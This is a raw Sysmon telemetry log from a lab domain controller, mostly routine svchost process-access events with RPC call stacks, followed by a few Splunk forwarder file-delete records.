13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201158Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201157Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201156Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201155Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201154Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201153Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201152Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201151Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201150Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201149Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201148Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201147Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201146Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201145Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201144Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201143Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201142Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201141Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201140Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201139Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201138Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201137Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201136Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201135Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201134Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201133Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201132Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201131Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:11.759{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04FB48E896DD7B868BC7B304981AAEE3,SHA256=A71D780FBD20AD0715BF25D8493DFB75DE7C48460427D10444BA5C0C0ACB1734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:12.775{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D2FA3F2C5239863770E223CBA44CF32,SHA256=66CECCC8A4A80F287DD16F53938296015E7228EE00F628A5675AA186725D604D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:13.806{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B467F8CCD9D0B1A380A5E05CADF5C4E0,SHA256=3881C4D303F74720A139A274F99F80EE0B3224A9B29B47D189F1CE79330A87A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:14.994{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD3C3C85680F274433E0D822FD20147B,SHA256=54E848D0CDA677E30302153D3DAFE2AD27D056524782245142FCD3F1564C6188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:15.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6D11BC00A062E14168B282054D119C2,SHA256=1904D54BEBB45DB8CC5900A464CA40EA12BF5ECA6669D54CC9CC360DD042F60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:15.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 